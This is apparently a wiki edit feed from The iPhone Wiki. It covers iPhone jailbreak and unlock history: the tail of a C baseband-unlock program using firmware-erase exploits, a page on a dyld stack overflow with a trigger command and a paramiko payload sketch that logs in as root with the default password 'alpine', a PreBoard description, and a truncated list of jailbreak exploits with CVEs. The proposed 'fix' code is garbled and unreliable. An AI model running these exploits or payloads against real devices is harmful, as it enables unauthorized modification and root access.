 FILE *secpack=fopen(argv[1],&amp;quot;rb&amp;quot;);&lt;br /&gt;
 fread(rsecpack,1,0x800,secpack);&lt;br /&gt;
 fclose(secpack);&lt;br /&gt;
 //Send the 1.1.3 secpack to erase 1.1.2&lt;br /&gt;
 sendsecpack(rsecpack);&lt;br /&gt;
 if(erase(0xA0020000, 0xA03BFFFE,1)==-1) {&lt;br /&gt;
 printf(&amp;quot;Erase failed\n&amp;quot;);&lt;br /&gt;
 printf(&amp;quot;Hang on...we can fix that\n&amp;quot;);&lt;br /&gt;
 const char efakesec[]={0x00,0x00,0x02,0xA0,0x00,0x00,0x3D,0x00,0x00,0x00,0x3D,0x00,0x00,0x00,0x00,0x00};	//full range including main fw...&lt;br /&gt;
 //2nd exploit variant for &amp;gt;=1.1.3&lt;br /&gt;
 memcpy(&amp;amp;rsecpack[0x780],efakesec,0x10);&lt;br /&gt;
 sendsecpack(rsecpack);&lt;br /&gt;
 endsecpack();&lt;br /&gt;
 erase(0xA03D0000,0xA03F0000,1);	//the only secpack free allowed erase :)&lt;br /&gt;
 printf(&amp;quot;Okay, lets try that again...\n&amp;quot;);&lt;br /&gt;
 secpack=fopen(argv[1],&amp;quot;rb&amp;quot;);	//reread&lt;br /&gt;
 fread(rsecpack,1,0x800,secpack);&lt;br /&gt;
 fclose(secpack);&lt;br /&gt;
 sendsecpack(rsecpack);&lt;br /&gt;
 if(erase(0xA0020000, 0xA03BFFFE,1)==-1) {&lt;br /&gt;
 printf(&amp;quot;Hmm...what did you do?&amp;quot;);&lt;br /&gt;
 return -1;&lt;br /&gt;
 }&lt;br /&gt;
 }&lt;br /&gt;
 //First exploit, the -0x20000 exploit&lt;br /&gt;
 //This writes the firmware, in all its unsigned glory&lt;br /&gt;
 //I guess Apple figured -0x400 was simple, -0x20000 is *much* harder&lt;br /&gt;
 address(0xA0000000,0);		//-0x20000, like i said :)&lt;br /&gt;
 FILE *bb=fopen(argv[2],&amp;quot;rb&amp;quot;);&lt;br /&gt;
 fseek(bb,0x9a4,SEEK_SET);		//skip bbupdater data and secpack&lt;br /&gt;
 int a,rc=0;&lt;br /&gt;
 do{&lt;br /&gt;
 a=fread(data,1,0x800,bb);&lt;br /&gt;
 if(rc&amp;lt;patchloc&amp;amp;&amp;amp;patchloc&amp;lt;(rc+a))	//patch the firmware&lt;br /&gt;
 {&lt;br /&gt;
 printf(&amp;quot;Patching...\n&amp;quot;);&lt;br /&gt;
 data[patchloc-rc+3] = 0xe3;&lt;br /&gt;
 data[patchloc-rc+2] = 0xa0;&lt;br /&gt;
 data[patchloc-rc+1] = 0x00;&lt;br /&gt;
 data[patchloc-rc]   = 0x01; &lt;br /&gt;
 }&lt;br /&gt;
 if(rc%0x10000==0||a!=0x800) printf(&amp;quot;Wrote: 0x%x 0x%x\n&amp;quot;,a,rc);&lt;br /&gt;
 if(a&amp;gt;0)&lt;br /&gt;
 bbwrite(a,1);		//write like hell&lt;br /&gt;
 rc+=a;&lt;br /&gt;
 }while(a&amp;gt;0);&lt;br /&gt;
 //Second exploit, the fake secpack erase range&lt;br /&gt;
 //If a valid secpack is present in 0x3C0000, the phone won't boot&lt;br /&gt;
 //And since endpack doesn't work, I needed to find another way&lt;br /&gt;
 const char fakesec[]={0x00,0x00,0x3C,0xA0,0x00,0x00,0x03,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00};	//not 0xA03D0000&lt;br /&gt;
 memcpy(&amp;amp;rsecpack[0x780],fakesec,0x10);&lt;br /&gt;
 sendsecpack(rsecpack);&lt;br /&gt;
 endsecpack();&lt;br /&gt;
 erase(0xA03D0000,0xA03F0000,1);	//the only secpack free allowed erase :)&lt;br /&gt;
 close(fp);&lt;br /&gt;
 resetbaseband();&lt;br /&gt;
 printf(&amp;quot;Enjoy your unlocked iPhone...\n&amp;quot;);&lt;br /&gt;
 return 0;&lt;br /&gt;
 }&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=OpenSharedCacheFile&amp;diff=111209</id>
		<title>OpenSharedCacheFile</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=OpenSharedCacheFile&amp;diff=111209"/>
		<updated>2021-03-05T04:51:49Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Apple's fix */ Add a space&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The OpenSharedCacheFile bug was found by [[i0n1c]]. This bug is a simple stack overflow.&lt;br /&gt;
== Opensharedcachefile() function ==&lt;br /&gt;
 int openSharedCacheFile()&lt;br /&gt;
 {&lt;br /&gt;
   char path[1024];&lt;br /&gt;
   strcpy(path, sSharedCacheDir);&lt;br /&gt;
   strcat(path, &amp;quot;/&amp;quot;);&lt;br /&gt;
   strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);&lt;br /&gt;
   return ::open(path, O_RDONLY);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Triggering the vuln ==&lt;br /&gt;
&lt;br /&gt;
To trigger it, run the following&lt;br /&gt;
 DYLD_SHARED_CACHE_DIR = &amp;quot;A&amp;quot; * 2000 \&lt;br /&gt;
 DYLD_SHARED_REGION = private /bin/launchctl&lt;br /&gt;
This will overflow the PC register making it a stack overflow.&lt;br /&gt;
&lt;br /&gt;
== Exploiting it ==&lt;br /&gt;
&lt;br /&gt;
Since this bug can takeover the PC register, you first need to know where the bug starts &lt;br /&gt;
for now lets say it crashes after 1024 A's, so your payload to get root would be&lt;br /&gt;
  junk = &amp;quot;A&amp;quot; * 1024 &lt;br /&gt;
  shellcode = &amp;quot;&amp;quot;&lt;br /&gt;
  payload = &amp;quot;DYLD_SHARED_CACHE_DIR&amp;quot; &lt;br /&gt;
  actual  = payload+junk+shellcode \&lt;br /&gt;
  cmd = &amp;quot;DYLD_SHARED_REGION = &amp;quot;private /bin/launchctl&amp;quot;             &lt;br /&gt;
  ssh = paramiko.SSHClient()&lt;br /&gt;
  server = &amp;quot;&amp;quot; #whatever IP &lt;br /&gt;
  ssh.connect(server, username=&amp;quot;root&amp;quot;, password=&amp;quot;alpine&amp;quot;)&lt;br /&gt;
  ssh.exec_command(actual)&lt;br /&gt;
  ssh.exec_command(cmd)&lt;br /&gt;
&lt;br /&gt;
== Apple's fix ==&lt;br /&gt;
&lt;br /&gt;
I'm guessing they added an if-statement to check for the size sSharedCacheDir&lt;br /&gt;
so like this.&lt;br /&gt;
&lt;br /&gt;
  extern void _ZN4dyld4haltEPKc(const char* msg) __attribute__((noreturn));&lt;br /&gt;
  void __stack_chk_fail()&lt;br /&gt;
  {&lt;br /&gt;
  _ZN4dyld4haltEPKc(&amp;quot;stack buffer overrun&amp;quot;);&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
  if(sizeof(sSharedCacheDir &amp;gt;= 1024){&lt;br /&gt;
  __stack_chk_fail();&lt;br /&gt;
  }&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=/Applications/PreBoard.app&amp;diff=111200</id>
		<title>/Applications/PreBoard.app</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=/Applications/PreBoard.app&amp;diff=111200"/>
		<updated>2021-03-04T20:29:32Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Updated what happens when PreBoard is opened.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The complete purpose of PreBoard is currently unknown. &lt;br /&gt;
&lt;br /&gt;
This application runs right after boot (before the first device unlock) and thus data at rest protection is in place.  Once the PIN is entered, the encrypted user storage becomes accessible, and the key is handed to the SEP for use when the device is unlocked via TouchID or FaceID.  Because between iOS releases Apple changes data formats, this allows for user data to be migrated.  It is also the UI that is shown when a device is restored via iTunes.&lt;br /&gt;
&lt;br /&gt;
It is known that this app runs once upon restoring and/or updating. PreBoard is what shows the &amp;quot;slide to upgrade&amp;quot; text on a screen that looks similar to the Enter Passcode screen. &lt;br /&gt;
&lt;br /&gt;
It also tracks if the user has activated their device or not. If the device is activated PreBoard will not show up. &lt;br /&gt;
&lt;br /&gt;
If you launch PreBoard off of [[/System/Library/CoreServices/SpringBoard.app|SpringBoard]], it will not launch and the app will crash on iOS &amp;lt; 13. On iOS ≥ 13, it will either freeze the device if the device does not have a passcode, Touch ID, or Face ID enabled, or a white screen will be shown until the device authenticates with either Touch ID or Face ID. &lt;br /&gt;
&lt;br /&gt;
PreBoard.app works with [[/System/Library/CoreServices/SpringBoard.app|SpringBoard]] and [[backboardd]].&lt;br /&gt;
&lt;br /&gt;
== Parents ==&lt;br /&gt;
{{parent|Applications}}&lt;br /&gt;
&lt;br /&gt;
[[Category:Software]]&lt;br /&gt;
[[Category:Filesystem]]&lt;br /&gt;
[[Category:Application]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=111124</id>
		<title>Jailbreak Exploits</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=111124"/>
		<updated>2021-03-02T15:06:16Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* checkra1n (14.0 - 14.2~b) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
